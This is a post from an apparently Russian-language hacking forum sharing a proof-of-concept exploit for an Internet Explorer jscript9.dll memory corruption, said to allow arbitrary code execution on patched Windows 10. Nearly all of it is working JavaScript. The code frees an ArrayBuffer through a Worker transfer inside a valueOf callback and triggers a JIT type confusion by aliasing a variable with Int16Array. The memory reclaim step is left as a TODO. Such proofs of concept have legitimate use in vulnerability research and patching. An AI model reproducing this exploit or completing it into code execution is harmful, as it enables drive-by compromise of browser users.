• XSS INCEPTION #5 - то, чего не было много лет. Е-зин, он же электронный журнал. Заходите! Выпуск #5 уже ждет вас!

Internet Explorer jscript9.dll Memory Corruption

DarckSol

(L1) cache
Пользователь
Регистрация
17.03.2008
Сообщения
771
Реакции
61
There is a vulnerability in jscript9 that could potentially be exploited to execute arbitrary code when viewing an attacker-controlled website in Internet Explorer. The vulnerability has been confirmed on Windows 10 64-bit with the latest security patches applied.

Код:
<!-- saved from url=(0014)about:internet -->
<script>

alert('start');

// prepare objects
var buf = new ArrayBuffer(0x8c);
var arr = new Int32Array(buf);

var o = {};
o.valueOf = function() {

    alert('callback');

    // free 
    worker = new Worker('worker.js');
    worker.postMessage(buf, [buf]);
    worker.terminate();
    worker = null;

    // sleep
    var start = Date.now();
    while (Date.now() - start < 200) {}

    // TODO: reclaim freed memory

    return 0
};

// generate function from string in order to have a clean bytecode generator
var vulnstr =
"for (let i=0; i<1; i++) {\n" +
"    function opt(A, x, crash) {\n" +
"        'use strict';\n" +
"        const aagaaaaaaahabauaaaaa = x+1;\n" + //special variable name so that hash is eqal to 0x109 (property ID of Int16Array)
"        const c02 = aagaaaaaaahabauaaaaa+1;\n" +
"        const c03 = c02+1;\n" +
"        const c04 = c03+1;\n" +
"        const c05 = c04+1;\n" +
"        let c06 = c05+1;\n" +  // this variable will alias with Int16Array
"        const c07 = c06+1;\n" +
"        const c08 = c07+1;\n" +
"        const c09 = c08+1;\n" +
"        const c10 = c09+1;\n" +
"        const c11 = c10+1;\n" +
"        const c12 = c11+1;\n" +
"        const c13 = c12+1;\n" +
"        const c14 = c13+1;\n" +
"        const c15 = c14+1;\n" +
"        const c16 = c15+1;\n" +
"        const c17 = c16+1;\n" +
"        const c18 = c17+1;\n" +
"        const c19 = c18+1;\n" +
"        const c20 = c19+1;\n" +
"        const c21 = c20+1;\n" +
"        const c22 = c21+1;\n" +
"        const c23 = c22+1;\n" +
"        const c24 = c23+1;\n" +
"        const c25 = c24+1;\n" +
"        const c26 = c25+1;\n" +
"        const c27 = c26+1;\n" +
"        const c28 = c27+1;\n" +
"        const c29 = c28+1;\n" +
"        const c30 = c29+1;\n" +
"        const c31 = c30+1;\n" +
"        const c32 = c31+1;\n" +
"        const c33 = c32+1;\n" +
"        const c34 = c33+1;\n" +
"        const c35 = c34+1;\n" +
"        const c36 = c35+1;\n" +
"        const c37 = c36+1;\n" +
"        const c38 = c37+1;\n" +
"        if(crash) {\n" +
"          c06 = c06 + 1;\n" + // we must change it here so that the value below is not known
"          Int16Array = o;\n" + // here we actually change the value (and type) of c06
"        }\n" +
"        A[0] = c06;\n" + // if crash==1, c06 is an object here, but JIT thinks it's an integer
"        eval(1);\n" +  // needed to trigger ByteCodeGenerator::EmitScopeObjectInit
"    }\n" +
"    for(var i=0; i<100000; i++) {\n" + // jit a function
"      opt(arr, 1, 0);\n" +
"    }\n" +
"    opt(arr, 1, 1);\n" +
"    alert('failed');\n" +
"}";


vuln = Function(vulnstr);
vuln();

</script>
 
Верх